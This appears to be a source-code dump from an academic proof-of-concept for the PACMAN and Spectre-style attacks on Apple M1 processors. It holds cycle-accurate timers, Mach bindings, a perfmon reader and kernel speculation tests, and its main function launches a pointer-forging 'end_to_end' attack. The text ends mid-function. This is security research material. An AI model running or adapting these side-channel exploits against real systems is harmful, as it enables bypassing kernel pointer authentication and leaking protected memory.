`size`: How many bytes to update? 65 | * * `set_max` 66 | * * `new_prot`: New bit vector of protections to add. 
67 | * 68 | * # Return Value 69 | * Returns a kernel error return type (`kern_return_t`). If this is not `KERN_SUCCESS`, 70 | * then some sort of error occurred. The error can be viewed with `mach_error_string`. 71 | */ 72 | pub fn mach_vm_protect(target: MachPort, addr: *const u8, size: usize, set_max: u32, new_prot: u64) -> KernReturn; 73 | 74 | /** 75 | * Read virtual memory from a mach port. 76 | * 77 | * # Arguments 78 | * * `target`: The port to read from. 79 | * * `addr`: Virtual address in the port to read. 80 | * * `size`: How many bytes to read? 81 | * * `data`: (OUT) This will be updated to point to the new buffer. 82 | * * `dataCount`: (OUT) This will be updated with the number of bytes read. 83 | * 84 | * # Return Value 85 | * Returns a kernel error return type (`kern_return_t`). If this is not `KERN_SUCCESS`, 86 | * then some sort of error occurred. The error can be viewed with `mach_error_string`. 87 | */ 88 | pub fn mach_vm_read(target: MachPort, addr: usize, size: usize, data: *mut *const u8, dataCount: *mut u64) -> KernReturn; 89 | 90 | /** 91 | * Aquire the task port for a given process by PID. 92 | * If PID is 0, this gets us the kernel task port. 93 | * 94 | * # Arguments 95 | * * `port`: The port from which the new port should be aquired (usually just mach_task_self()). 96 | * * `pid`: Process ID to grab. 97 | * * `newTask`: Points to a mach port (aka u64) that will be updated with the new task port. 98 | */ 99 | pub fn task_for_pid(port: MachPort, pid: u64, newTask: *mut MachPort) -> KernReturn; 100 | 101 | /** 102 | * Return the mach error for a given kern_return_t as a C string. 103 | * 104 | * # Arguments 105 | * * `err`: The error code returned from a mach call. 106 | * 107 | * # Return Value 108 | * Returns a pointer to a C string containing the error string. 109 | */ 110 | pub fn mach_error_string(err: KernReturn) -> *const std::os::raw::c_char; 111 | } 112 | 113 | /** 114 | * Returns the current task port for this process. 
115 | * 116 | * # Return Value 117 | * Returns the task port (for use with other mach methods). 118 | */ 119 | pub unsafe fn mach_task_self() -> MachPort { 120 | return core::ptr::read_volatile(&mach_task_self_); 121 | } 122 | -------------------------------------------------------------------------------- /src/timer_multithread.rs: -------------------------------------------------------------------------------- 1 | /*! 2 | * It's timer_msr except using the counter.rs multithreaded counter as a timer. 3 | */ 4 | 5 | use crate::*; 6 | use core::arch::asm; 7 | 8 | /// TODO: Remove these from here 9 | // These are here because pacmankit kindly subtracts the timer overhead when reporting MSR reads from the kernel. 10 | // These are strictly a timer_msr thing so they do not belong here. We don't track overheads in this timer module as the 11 | // multithread timer has lots of variance and isn't super precise. We keep these equal to the value in timer_msr.rs 12 | // so that when doing timing with the multithreaded timer in userspace, the kernel overhead is still taken care of. 13 | // This will be resolved when we refactor the code. 14 | pub const TIMER_OVERHEAD_PCORE : u64 = 56; 15 | pub const TIMER_OVERHEAD_ECORE : u64 = 52; 16 | 17 | /** 18 | * Returns the time to access a given address using the counter thread. 19 | */ 20 | pub unsafe fn time_access(addr: u64) -> u64 { 21 | let t1 : u64; 22 | let t2 : u64; 23 | asm!{ 24 | "dsb sy", 25 | "isb", 26 | "ldr {t1}, [{cnt_addr}]", 27 | "isb", 28 | "ldr {val_out}, [{addr}]", 29 | "isb", 30 | "ldr {t2}, [{cnt_addr}]", 31 | "isb", 32 | "dsb sy", 33 | val_out = out(reg) _, 34 | addr = in(reg) addr, 35 | cnt_addr = in(reg) &mut counter::CTR as *mut u64 as u64, 36 | t1 = out(reg) t1, 37 | t2 = out(reg) t2, 38 | } 39 | return t2 - t1; 40 | } 41 | 42 | /** 43 | * Returns the time to write to a given address using the thread counter. 
 */
pub unsafe fn time_store(addr: u64) -> u64 {
    let t1 : u64;
    let t2 : u64;
    // Arbitrary marker value ('1111…' in ASCII) written to the target address.
    let val_in : u64 = 0x3131313131313131;
    asm!{
        // dsb/isb fences bracket the measurement so prior memory traffic and
        // instruction reordering cannot bleed into the timed window.
        "dsb sy",
        "isb",
        // t1 = current value of the counter thread's shared counter
        "ldr {t1}, [{cnt_addr}]",
        "isb",
        // The store being timed.
        "str {val_in}, [{addr}]",
        "isb",
        // t2 = counter after the store
        "ldr {t2}, [{cnt_addr}]",
        "isb",
        "dsb sy",
        val_in = in(reg) val_in,
        addr = in(reg) addr,
        cnt_addr = in(reg) &mut counter::CTR as *mut u64 as u64,
        t1 = out(reg) t1,
        t2 = out(reg) t2,
    }
    return t2 - t1;
}

/**
 * Returns the time to execute a given address using the thread counter.
 */
pub unsafe fn time_exec(addr: u64) -> u64 {
    let t1 : u64;
    let t2 : u64;
    asm!{
        "dsb sy",
        "isb",
        "ldr {t1}, [{cnt_addr}]",
        "isb",
        // Branch-and-link to the target; the target is expected to return
        // (e.g. a retpoline page of `ret` instructions).
        "blr {addr}",
        "isb",
        "ldr {t2}, [{cnt_addr}]",
        "isb",
        "dsb sy",
        addr = in(reg) addr,
        cnt_addr = in(reg) &mut counter::CTR as *mut u64 as u64,
        t1 = out(reg) t1,
        t2 = out(reg) t2,
    }
    return t2 - t1;
}

/**
 * Returns the constant time offset associated with performing measurements.
 * This number can be measured for a platform and then treated as a constant.
 */
pub fn timer_overhead() -> u64 {
    let t1 : u64;
    let t2 : u64;
    // NOTE(review): val_out is declared but never used here — a NOP stands in
    // for the LDR that the real measurement routines perform.
    let val_out : u64;
    unsafe {
        asm!{
            "isb",
            "ldr {t1}, [{cnt_addr}]",
            "isb",
            "nop", // Do a NOP instead of a LDR here
            "isb",
            "ldr {t2}, [{cnt_addr}]",
            "isb",
            cnt_addr = in(reg) &mut counter::CTR as *mut u64 as u64,
            t1 = out(reg) t1,
            t2 = out(reg) t2,
        }
    }
    return t2 - t1;
}

/**
 * Reports the time for a cache miss.
 *
 * # Arguments
 * * `untouched_page`: A page that has been allocated but never written to/ read from
 *                     (and is therefore not present in the TLB).
 *
 * # Return Value
 * Returns the number of cycles on a cache miss as reported by `timer::time_access`.
 *
 * # Side Effects
 * Will load several addresses from the page.
 *
 * # References
 * See 'Branch Different' by Hetterich and Schwarz Section 3.2 Listing 1.
 */
pub fn time_miss(untouched_page: &mut [u8]) -> u64 {
    unsafe {
        // First access walks the page tables / fills the TLB; the second access
        // (3 cache lines away) then measures a pure L2 miss.
        time_access(&untouched_page[0] as *const u8 as u64);
        return time_access(&untouched_page[cache::L2_LINESIZE * 3] as *const u8 as u64);
    }
}

/**
 * Reports the time for a cache hit.
 *
 * # Arguments
 * * `page`: A page that can be read from.
 *
 * # Return Value
 * Returns the number of cycles on a cache hit as reported by `timer::time_access`.
 *
 * # Side Effects
 * Will load several addresses from the page.
 *
 * # References
 * See 'Branch Different' by Hetterich and Schwarz Section 3.2 Listing 1.
 */
pub fn time_hit(page: &mut [u8]) -> u64 {
    unsafe {
        // First access brings the line into the cache; the second measures the hit.
        time_access(&page[0] as *const u8 as u64);
        return time_access(&page[0] as *const u8 as u64);
    }
}
--------------------------------------------------------------------------------
/misc/perfmon.c:
--------------------------------------------------------------------------------
// Interact with /dev/perfmon
// NOTE(review): the angle-bracket header names on the following #include lines
// were stripped by the text extraction that produced this dump — likely the
// usual stdio.h/stdlib.h/string.h/errno.h/fcntl.h/unistd.h/sys/ioctl.h/
// stdint.h set given the calls below. Restore from the original source.
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

// Extracted headers from Kernel.framework:
#include "machine_perfmon.h"

#include "pacman.h"

// Modified From: tests/perfmon_unit_tests.c
// Two dummy perf events used to exercise PERFMON_CTL_ADD_EVENT below.
struct perfmon_event test_events[2] = {
    {
        .pe_name = "test",
        .pe_number = 1,
        .pe_counter = 2,
    }, {
        .pe_name = "second",
        .pe_number = 2,
        .pe_counter = 4,
    },
};

int main () {
    // You can try "/dev/perfmon_uncore" or "/dev/perfmon_core"
32 | int fd = open("/dev/perfmon_core", O_RDWR); 33 | if (fd <= 0) { 34 | fprintf(stderr, "Error: %s\n", strerror(errno)); 35 | exit(EXIT_FAILURE); 36 | } 37 | 38 | struct perfmon_layout layout; 39 | int rv = ioctl(fd, PERFMON_CTL_GET_LAYOUT, &layout); 40 | printf("Retval is %d\n", rv); 41 | if (rv != 0) { 42 | printf("error is %s\n", strerror(errno)); 43 | exit(EXIT_FAILURE); 44 | } 45 | 46 | printf("HW Regs: %d\n", layout.pl_reg_count); 47 | 48 | struct perfmon_spec specs; 49 | memset(&specs, '\x00', sizeof(specs)); 50 | rv = ioctl(fd, PERFMON_CTL_SPECIFY, &specs); 51 | printf("Retval is %d\n", rv); 52 | if (rv != 0) { 53 | printf("error is %s\n", strerror(errno)); 54 | exit(EXIT_FAILURE); 55 | } 56 | 57 | perfmon_name_t *names = calloc(layout.pl_reg_count, 58 | sizeof(names[0])); 59 | uint64_t *values = calloc( 60 | layout.pl_reg_count * layout.pl_unit_count, 61 | sizeof(values[0])); 62 | 63 | /* 64 | 65 | PMCR0 (0), PMCR1 (1), PMCR2 (2), PMCR3 (3), 66 | PMCR4 (4), PMESR0 (5), PMESR1 (6), PMSR (7), 67 | OPMAT0 (8), OPMAT1 (9), PMCR_BVRNG4 (10), PMCR_BVRNG5 (11), 68 | PM_MEMFLT_CTL23 (12), PM_MEMFLT_CTL45 (13), PMMMAP (14), PMC0 (15), 69 | PMC1 (16), PMC2 (17), PMC3 (18), PMC4 (19), 70 | PMC5 (20), PMC6 (21), PMC7 (22), PMC8 (23), 71 | PMC9 (24) 72 | */ 73 | 74 | rv = ioctl(fd, PERFMON_CTL_LIST_REGS, names); 75 | for (unsigned short j = 0; j < layout.pl_reg_count; j++) { 76 | if (j != 0) { 77 | printf(", "); 78 | } 79 | // if (j % 4 == 0) { 80 | // printf("\n%4s", ""); 81 | // } 82 | printf("%s", names[j], j); 83 | } 84 | printf("\n"); 85 | 86 | rv = ioctl(fd, PERFMON_CTL_SAMPLE_REGS, values); 87 | for (unsigned short j = 0; j < layout.pl_unit_count; j++) { 88 | printf("%2d: ", j); 89 | for (unsigned short k = 0; k < layout.pl_reg_count; 90 | k++) { 91 | if (k != 0) { 92 | printf(", "); 93 | if (k % 4 == 0) { 94 | printf("\n%4s", ""); 95 | } 96 | } 97 | 98 | uint64_t value = values[j * layout.pl_reg_count + k]; 99 | printf("0x%llX", value); 100 | } 101 | 
printf("\n"); 102 | } 103 | 104 | // again! 105 | rv = ioctl(fd, PERFMON_CTL_SAMPLE_REGS, values); 106 | for (unsigned short j = 0; j < layout.pl_unit_count; j++) { 107 | printf("%2d: ", j); 108 | for (unsigned short k = 0; k < layout.pl_reg_count; 109 | k++) { 110 | if (k != 0) { 111 | printf(", "); 112 | if (k % 4 == 0) { 113 | printf("\n%4s", ""); 114 | } 115 | } 116 | 117 | uint64_t value = values[j * layout.pl_reg_count + k]; 118 | printf("0x%llX", value); 119 | } 120 | printf("\n"); 121 | } 122 | 123 | // now just the cycle counter 124 | #define CYCLE_COUNTER_IDX ((15)) 125 | ioctl(fd, PERFMON_CTL_SAMPLE_REGS, values); 126 | printf("0x%llX\n", values[15]); 127 | ioctl(fd, PERFMON_CTL_SAMPLE_REGS, values); 128 | printf("0x%llX\n", values[15]); 129 | 130 | // Let's time something 131 | ioctl(fd, PERFMON_CTL_SAMPLE_REGS, values); 132 | int t1 = values[15]; 133 | for (int i = 0; i < 100; i++) { 134 | int x = i + 1; 135 | } 136 | ioctl(fd, PERFMON_CTL_SAMPLE_REGS, values); 137 | int t2 = values[15]; 138 | printf("It took %d cycles to do that loop\n", t2 - t1); 139 | printf("t1: %lld\nt2: %lld\n", t1, t2); 140 | 141 | rv = ioctl(fd, PERFMON_CTL_ADD_EVENT, &test_events[0]); 142 | printf("PERFMON_CTL_ADD_EVENT Retval is %d\n", rv); 143 | if (rv != 0) { 144 | printf("error is %s\n", strerror(errno)); 145 | exit(EXIT_FAILURE); 146 | } 147 | 148 | printf("Specs: %d\n", specs.ps_attrs); 149 | 150 | // rv = ioctl(fd, PERFMON_CTL_CONFIGURE); 151 | // printf("Retval is %d\n", rv); 152 | // if (rv != 0) { 153 | // printf("error is %s\n", strerror(errno)); 154 | // exit(EXIT_FAILURE); 155 | // } 156 | 157 | uint64_t tval = SREG_READ(SREG_PMC0); 158 | printf("%lld\n", tval); 159 | 160 | uint64_t pmcr0_val = values[0]; 161 | printf("PMCR0 is 0x%llX\n", pmcr0_val); 162 | } -------------------------------------------------------------------------------- /src/timer_msr.rs: -------------------------------------------------------------------------------- 1 | /*! 
2 | * Utilities for reading various timers. 3 | * 4 | * Requires PACMAN patch to XNU for this to work. 5 | */ 6 | 7 | use crate::*; 8 | use core::arch::asm; 9 | 10 | /// The overhead of doing timer measurements with a NOP 11 | /// This can be measured for your system with timer::timer_overhead() 12 | /// Set this to 0 to ignore. This value will be different depending on if 13 | /// you are running on a P or E core. 14 | pub const TIMER_OVERHEAD_PCORE : u64 = 56; 15 | pub const TIMER_OVERHEAD_ECORE : u64 = 52; 16 | 17 | /** 18 | * Returns the time to access a given address using the high resolution timers 19 | * 20 | * `S3_2_c15_c0_0` == `SREG_PMC0` (Cycle Counter). 21 | * Assumes the Pacman kernel patches are applied such that the timers are usable from EL0. 22 | */ 23 | pub unsafe fn time_access(addr: u64) -> u64 { 24 | let t1 : u64; 25 | let t2 : u64; 26 | asm!{ 27 | "dsb sy", 28 | "isb", 29 | "mrs {t1}, S3_2_c15_c0_0", 30 | "isb", 31 | "ldr {val_out}, [{addr}]", 32 | "isb", 33 | "mrs {t2}, S3_2_c15_c0_0", 34 | "isb", 35 | "dsb sy", 36 | val_out = out(reg) _, 37 | addr = in(reg) addr, 38 | t1 = out(reg) t1, 39 | t2 = out(reg) t2, 40 | } 41 | // Doing no load at all with 2 ISB's in between results in 56 cycles. 42 | // Doing only 1 ISB in between results in 28 (sometimes 26) cycles. 43 | return t2 - t1 - TIMER_OVERHEAD_PCORE; 44 | } 45 | 46 | /** 47 | * Returns the time to write to a given address using the high resolution timers 48 | * 49 | * `S3_2_c15_c0_0` == `SREG_PMC0` (Cycle Counter). 50 | * Assumes the Pacman kernel patches are applied such that the timers are usable from EL0. 
51 | */ 52 | pub unsafe fn time_store(addr: u64) -> u64 { 53 | let t1 : u64; 54 | let t2 : u64; 55 | let val_in : u64 = 0x3131313131313131; 56 | asm!{ 57 | "dsb sy", 58 | "isb", 59 | "mrs {t1}, S3_2_c15_c0_0", 60 | "isb", 61 | "str {val_in}, [{addr}]", 62 | "isb", 63 | "mrs {t2}, S3_2_c15_c0_0", 64 | "isb", 65 | "dsb sy", 66 | val_in = in(reg) val_in, 67 | addr = in(reg) addr, 68 | t1 = out(reg) t1, 69 | t2 = out(reg) t2, 70 | } 71 | // Doing no load at all with 2 ISB's in between results in 56 cycles. 72 | // Doing only 1 ISB in between results in 28 (sometimes 26) cycles. 73 | return t2 - t1 - TIMER_OVERHEAD_PCORE; 74 | } 75 | 76 | /** 77 | * Returns the time to execute a given address using the high resolution timers 78 | * 79 | * `S3_2_c15_c0_0` == `SREG_PMC0` (Cycle Counter). 80 | * Assumes the Pacman kernel patches are applied such that the timers are usable from EL0. 81 | */ 82 | pub unsafe fn time_exec(addr: u64) -> u64 { 83 | let t1 : u64; 84 | let t2 : u64; 85 | asm!{ 86 | "dsb sy", 87 | "isb", 88 | "mrs {t1}, S3_2_c15_c0_0", 89 | "isb", 90 | "blr {addr}", 91 | "isb", 92 | "mrs {t2}, S3_2_c15_c0_0", 93 | "isb", 94 | "dsb sy", 95 | addr = in(reg) addr, 96 | t1 = out(reg) t1, 97 | t2 = out(reg) t2, 98 | } 99 | // Doing no load at all with 2 ISB's in between results in 56 cycles. 100 | // Doing only 1 ISB in between results in 28 (sometimes 26) cycles. 101 | return t2 - t1 - TIMER_OVERHEAD_PCORE; 102 | } 103 | 104 | /** 105 | * Returns the constant time offset associated with performing measurements. 106 | * This number can be measured for a platform and then treated as a constant. 
107 | */ 108 | pub fn timer_overhead() -> u64 { 109 | let t1 : u64; 110 | let t2 : u64; 111 | let val_out : u64; 112 | unsafe { 113 | asm!{ 114 | "isb", 115 | "mrs {t1}, S3_2_c15_c0_0", 116 | "isb", 117 | "nop", // Do a NOP instead of a LDR here 118 | "isb", 119 | "mrs {t2}, S3_2_c15_c0_0", 120 | "isb", 121 | t1 = out(reg) t1, 122 | t2 = out(reg) t2, 123 | } 124 | } 125 | return t2 - t1; 126 | } 127 | 128 | /** 129 | * Reports the time for a cache miss. 130 | * 131 | * # Arguments 132 | * * `untouched_page`: A page that has been allocated but never written to/ read from 133 | * (and is therefore not present in the TLB). 134 | * 135 | * # Return Value 136 | * Returns the number of cycles on a cache miss as reported by `timer::time_access`. 137 | * 138 | * # Side Effects 139 | * Will load several addresses from the page. 140 | * 141 | * # References 142 | * See 'Branch Different' by Hetterich and Schwarz Section 3.2 Listing 1. 143 | */ 144 | pub fn time_miss(untouched_page: &mut [u8]) -> u64 { 145 | unsafe { 146 | time_access(&untouched_page[0] as *const u8 as u64); 147 | return time_access(&untouched_page[cache::L2_LINESIZE * 3] as *const u8 as u64); 148 | } 149 | } 150 | 151 | /** 152 | * Reports the time for a cache hit. 153 | * 154 | * # Arguments 155 | * * `page`: A page that can be read from. 156 | * 157 | * # Return Value 158 | * Returns the number of cycles on a cache hit as reported by `timer::time_access`. 159 | * 160 | * # Side Effects 161 | * Will load several addresses from the page. 162 | * 163 | * # References 164 | * See 'Branch Different' by Hetterich and Schwarz Section 3.2 Listing 1. 
165 | */ 166 | pub fn time_hit(page: &mut [u8]) -> u64 { 167 | unsafe { 168 | time_access(&page[0] as *const u8 as u64); 169 | return time_access(&page[0] as *const u8 as u64); 170 | } 171 | } -------------------------------------------------------------------------------- /src/main.rs: -------------------------------------------------------------------------------- 1 | #![allow(unused_imports)] 2 | #![allow(unused_variables)] 3 | #![allow(unused_unsafe)] 4 | #![allow(unused_parens)] 5 | #![allow(unused_mut)] 6 | #![allow(non_snake_case)] 7 | #![allow(unused_must_use)] 8 | 9 | pub mod libdarwin; 10 | pub mod qos; 11 | pub mod retpoline; 12 | pub mod tests; 13 | pub mod counter; 14 | pub mod evset; 15 | pub mod pacmankit; 16 | pub mod cache; 17 | pub mod msr; 18 | pub mod attacks; 19 | pub mod pac; 20 | 21 | // Switch this with timer_multithread.rs to use that instead 22 | #[path="timer_msr.rs"] 23 | pub mod timer; 24 | 25 | use libdarwin::*; 26 | use timer::*; 27 | use mach::*; 28 | use qos::*; 29 | use retpoline::*; 30 | use tests::*; 31 | use counter::*; 32 | use evset::*; 33 | use kernel_rw::*; 34 | use iokit::*; 35 | use std::thread; 36 | use core::ptr::{read_volatile, write_volatile}; 37 | use core::arch::asm; 38 | use std::ffi::{CString, CStr}; 39 | use pacmankit::*; 40 | use cache::*; 41 | use std::collections::LinkedList; 42 | use attacks::*; 43 | use attacks::pacman::*; 44 | use pac::*; 45 | 46 | use rand::thread_rng; 47 | use rand::prelude::SliceRandom; 48 | 49 | /// How many bytes of memory should we create? 
50 | pub const MEM_REGION_SIZE : usize = 0x40000000000usize; 51 | 52 | pub unsafe fn init_memory(memory_region: &mut [u8]) { 53 | let mut iter = 0; 54 | for i in (0..memory_region.len()).step_by(evset::STRIDE) { 55 | if iter >= evset::EVSET_SIZE_MAX { break; } 56 | core::ptr::write_volatile(&mut memory_region[i], 0x41); 57 | core::ptr::read_volatile(&memory_region[i]); 58 | iter+=1; 59 | } 60 | } 61 | 62 | /// Flush the entire L2 cache 63 | pub unsafe fn flush_cache(memory_region: &mut [u8]) { 64 | for i in (0..cache::L2_SIZE).step_by(cache::L1D_LINESIZE) { 65 | core::ptr::write_volatile(&mut memory_region[i], 0x41); 66 | core::ptr::read_volatile(&memory_region[i]); 67 | } 68 | } 69 | 70 | /// Flush the L1 iCache 71 | /// The provided address `retpoline` should be a cache::L1I_SIZE region filled with `ret`s. 72 | pub unsafe fn flush_iCache(retpoline: u64) { 73 | let retpoline_unsigned = retpoline & (!PAC_BITMASK); 74 | for i in (0..cache::L2_SIZE).step_by(cache::L1I_LINESIZE) { 75 | timer::time_exec(retpoline_unsigned + i as u64); 76 | } 77 | } 78 | 79 | /** 80 | * Run the attacker payload. 81 | * 82 | * # Arguments 83 | * * `shared_mem`: A memory buffer (represented as a slice) that can be used for experiments. 
84 | */ 85 | pub unsafe fn attack(shared_mem: &mut [u8]) { 86 | // Various evict+reload / prime+probe / spectre tests 87 | // attacks::evict_reload::inst_evict_reload(shared_mem); 88 | // attacks::evict_reload::data_evict_reload(shared_mem); 89 | // attacks::evict_reload::inst_evict_reload_kernel(shared_mem); 90 | // attacks::evict_reload::data_evict_reload_kernel(shared_mem); 91 | // attacks::prime_probe::inst_prime_probe(shared_mem); 92 | // attacks::spectre::inst_spectre_kernel(shared_mem); 93 | 94 | // PACMAN Inst/ Data 95 | // attacks::pacman::data_testing(shared_mem, true); 96 | // attacks::pacman::inst_testing(shared_mem, true); 97 | 98 | // Forge a vtable pointer and entry 99 | attacks::pacman::end_to_end(shared_mem); 100 | 101 | // Attack a real system call 102 | // attacks::pacman::pacman_real(shared_mem); 103 | } 104 | 105 | /** 106 | * Report diagnostic information about the platform. 107 | * 108 | * # Arguments 109 | * `shared_mem`: At least 1 page of memory that has never been read from/ written to. 110 | */ 111 | pub unsafe fn report_platform_info(shared_mem: &mut [u8]) { 112 | // It's cool to reuse the same page for measuring miss latency after doing a hit measurement, 113 | // just not the other way around. 114 | let timer_overhead = timer::timer_overhead(); 115 | let miss_latency = timer::time_miss(shared_mem); 116 | let hit_latency = timer::time_hit(shared_mem); 117 | 118 | println!("Hit took {} cycles", hit_latency); 119 | println!("Miss took {} cycles", miss_latency); 120 | println!("Timer overhead is {} cycles", timer_overhead); 121 | println!("We are on core {}", core_id()); 122 | } 123 | 124 | /** 125 | * Setup the execution environment and launch the attack/ traces. 
126 | */ 127 | pub fn main() { 128 | unsafe { 129 | crandom::srand(mach_absolute_time() as u32); 130 | 131 | // Pin ourselves to the P core 132 | if !set_core(CoreKind::PCORE) { 133 | println!("Error setting CPU affinity!"); 134 | return; 135 | } 136 | 137 | // Setup memory region 138 | let mut loc : *mut u8 = 0 as *mut u8; 139 | let kret = mach_vm_allocate( 140 | mach_task_self(), 141 | &mut loc, 142 | MEM_REGION_SIZE, 143 | VM_FLAGS_ANYWHERE 144 | ); 145 | 146 | let err_str = CStr::from_ptr(mach_error_string(kret)); 147 | 148 | if KERN_SUCCESS != kret { 149 | println!("Error creating memory region! ({}). Error is {:?}", kret, err_str); 150 | return; 151 | } 152 | 153 | println!("Created mach memory region at 0x{:X}", loc as u64); 154 | let shared_mem = core::slice::from_raw_parts_mut( 155 | loc as *mut u8, 156 | MEM_REGION_SIZE 157 | ); 158 | 159 | println!("Shared memory is at 0x{:X}", &shared_mem[0] as *const u8 as usize); 160 | 161 | // Create counter thread and sync up with it 162 | thread::spawn(|| counter_thread()); 163 | while 0 == read_volatile(&CTR) {} 164 | 165 | // Report platform info before shared_mem is initialized 166 | report_platform_info(shared_mem); 167 | init_memory(shared_mem); 168 | 169 | // Launch attacker code 170 | attack(shared_mem); 171 | } 172 | } 173 | -------------------------------------------------------------------------------- /src/attacks/spectre.rs: -------------------------------------------------------------------------------- 1 | /*! 2 | * Spectre testing. 
3 | */ 4 | use crate::*; 5 | use core::arch::asm; 6 | 7 | /// Target for userspace spectre data testing 8 | pub unsafe fn data_spectre_target(load_maybe: *const u8, do_it: bool) { 9 | if do_it { 10 | core::ptr::read_volatile(load_maybe); 11 | asm!{ 12 | "ldr {tmp}, [{ptr}]", 13 | tmp = lateout(reg) _, 14 | ptr = in(reg) load_maybe as u64, 15 | } 16 | } 17 | } 18 | 19 | /// Userspace spectre data attack 20 | pub unsafe fn data_spectre(memory_region: &mut [u8]) { 21 | let test_ptr = &memory_region[0] as *const u8; 22 | let spectre_ptr = &memory_region[4096] as *const u8; 23 | let spectre_addr = spectre_ptr as u64; 24 | 25 | core::ptr::read_volatile(test_ptr); 26 | core::ptr::read_volatile(spectre_ptr); 27 | init_memory(memory_region); 28 | 29 | for i in 0..128 { 30 | data_spectre_target(test_ptr, true); 31 | } 32 | 33 | data_spectre_target(spectre_ptr, false); 34 | println!("Time to access is {} cycles", timer::time_access(spectre_addr)); 35 | } 36 | 37 | /// Kernel mode spectre testing 38 | pub const NUM_DATA_SPECTRE_KERNEL_TRIALS : usize = 512; 39 | pub unsafe fn data_spectre_kernel(memory_region: &mut [u8]) { 40 | let handle = PacmanKitConnection::init().unwrap(); 41 | let kernel_region = handle.kernel_mmap().unwrap(); 42 | 43 | let train_ptr = kernel_region; 44 | let spectre_ptr = kernel_region + 0x100C80; 45 | let unrelated_ptr = kernel_region + 0x201DA0; 46 | 47 | println!("Training on 0x{:X}", train_ptr); 48 | println!("Spectre on 0x{:X}", spectre_ptr); 49 | let limit_va = handle.leak_limit_location().unwrap(); 50 | let limit_pa = handle.kernel_virt_to_phys(limit_va).unwrap(); 51 | println!("LIMIT is at 0x{:X} (PA 0x{:X})", limit_va, limit_pa); 52 | println!("LIMIT contains 0x{:X}", handle.kernel_read(limit_va).unwrap()); 53 | 54 | let limit_evset = evset::data_pevset(limit_va, limit_pa, memory_region); 55 | let mut limit_evset_chosen : Vec = limit_evset.choose_multiple(&mut rand::thread_rng(), 50).into_iter().cloned().collect(); 56 | let mut limit_indexes : 
Vec = (0..limit_evset_chosen.len()).collect(); 57 | limit_indexes.shuffle(&mut thread_rng()); 58 | 59 | let mut times = [0u64; NUM_DATA_SPECTRE_KERNEL_TRIALS]; 60 | 61 | for cur_iter_idx in 0..NUM_DATA_SPECTRE_KERNEL_TRIALS { 62 | // 0. Get everything setup to a good known initial condition 63 | handle.kernel_read(train_ptr).unwrap(); 64 | handle.kernel_read(spectre_ptr).unwrap(); 65 | handle.kernel_read(unrelated_ptr).unwrap(); 66 | init_memory(memory_region); 67 | 68 | // 1. Train branch predictor 69 | for i in 0..64 { 70 | handle.kernel_read_for_spectre(train_ptr, 0x00).unwrap(); 71 | } 72 | 73 | // 2. Evict LIMIT variable 74 | for i in 0..limit_indexes.len() { 75 | timer::time_access(limit_evset_chosen[limit_indexes[i]]); 76 | } 77 | // init_memory(memory_region); 78 | flush_cache(memory_region); 79 | 80 | // 3. Perform speculative access 81 | // handle.kernel_read_for_spectre(spectre_ptr, 0x50).unwrap(); 82 | 83 | // 4. Record results with kernel timing oracle 84 | let latency = handle.kernel_read_for_timing(spectre_ptr, true).unwrap(); 85 | times[cur_iter_idx] = latency; 86 | // let latency_limit = handle.kernel_read_for_timing(limit_va, true).unwrap(); 87 | // times[cur_iter_idx] = (latency, latency_limit); 88 | } 89 | 90 | // Make sure to do all printing *AFTER* the tests have completed! 
91 | // println!("Reload latency is {} cycles", latency); 92 | print!("["); 93 | for idx in 0..NUM_DATA_SPECTRE_KERNEL_TRIALS { 94 | print!("{},", times[idx]); 95 | } 96 | println!("]"); 97 | } 98 | 99 | /// Kernel mode spectre testing 100 | pub const NUM_INST_SPECTRE_KERNEL_TRIALS : usize = 512; 101 | pub unsafe fn inst_spectre_kernel(memory_region: &mut [u8]) { 102 | let handle = PacmanKitConnection::init().unwrap(); 103 | let kernel_region = handle.kernel_mmap().unwrap(); 104 | 105 | // @TODO: make this another address in the retpoline region: 106 | let train_ptr = handle.leak_win().unwrap() | PAC_BITMASK; 107 | // let spectre_ptr = handle.leak_method().unwrap() | PAC_BITMASK; 108 | let spectre_ptr = handle.leak_retpoline().unwrap() | PAC_BITMASK; 109 | 110 | println!("Training on 0x{:X}", train_ptr); 111 | println!("Spectre on 0x{:X}", spectre_ptr); 112 | let limit_va = handle.leak_limit_location().unwrap(); 113 | let limit_pa = handle.kernel_virt_to_phys(limit_va).unwrap(); 114 | println!("LIMIT is at 0x{:X} (PA 0x{:X})", limit_va, limit_pa); 115 | println!("LIMIT contains 0x{:X}", handle.kernel_read(limit_va).unwrap()); 116 | 117 | let limit_evset = evset::data_pevset(limit_va, limit_pa, memory_region); 118 | let mut limit_evset_chosen : Vec = limit_evset.choose_multiple(&mut rand::thread_rng(), 50).into_iter().cloned().collect(); 119 | let mut limit_indexes : Vec = (0..limit_evset_chosen.len()).collect(); 120 | limit_indexes.shuffle(&mut thread_rng()); 121 | 122 | let mut times = [0u64; NUM_INST_SPECTRE_KERNEL_TRIALS]; 123 | 124 | // Use a giant retpoline to flush the L1 iCache 125 | let mut retpoline_l1i_as_ptr : *mut u8 = 0 as *mut u8; 126 | let kret = mach::mach_vm_allocate( 127 | mach::mach_task_self(), 128 | &mut retpoline_l1i_as_ptr, 129 | cache::L2_SIZE, 130 | VM_FLAGS_ANYWHERE 131 | ); 132 | 133 | let err_str = CStr::from_ptr(mach_error_string(kret)); 134 | if KERN_SUCCESS != kret { 135 | println!("Error creating L1 iCache retpoline memory region! 
({}). Error is {:?}", kret, err_str); 136 | return; 137 | } 138 | 139 | let retpoline_l1i = (retpoline_l1i_as_ptr as u64) & (!PAC_BITMASK); 140 | 141 | retpoline::mk_retpoline_addr(retpoline_l1i as u64, cache::L2_SIZE); 142 | 143 | for cur_iter_idx in 0..NUM_INST_SPECTRE_KERNEL_TRIALS { 144 | // 0. Get everything setup to a good known initial condition 145 | handle.kernel_exec_for_timing(train_ptr, true).unwrap(); 146 | handle.kernel_exec_for_timing(spectre_ptr, true).unwrap(); 147 | init_memory(memory_region); 148 | flush_cache(memory_region); 149 | flush_iCache(retpoline_l1i); 150 | 151 | // 1. Train branch predictor 152 | for i in 0..64 { 153 | handle.kernel_exec_for_spectre(train_ptr, 0x00).unwrap(); 154 | } 155 | 156 | // 2. Evict LIMIT variable 157 | for i in 0..limit_indexes.len() { 158 | timer::time_access(limit_evset_chosen[limit_indexes[i]]); 159 | } 160 | // init_memory(memory_region); 161 | // flush_cache(memory_region); 162 | 163 | // 3. Perform speculative access 164 | // Commenting this out should result in DRAM latencies only: 165 | handle.kernel_exec_for_spectre(spectre_ptr, 0x50).unwrap(); 166 | 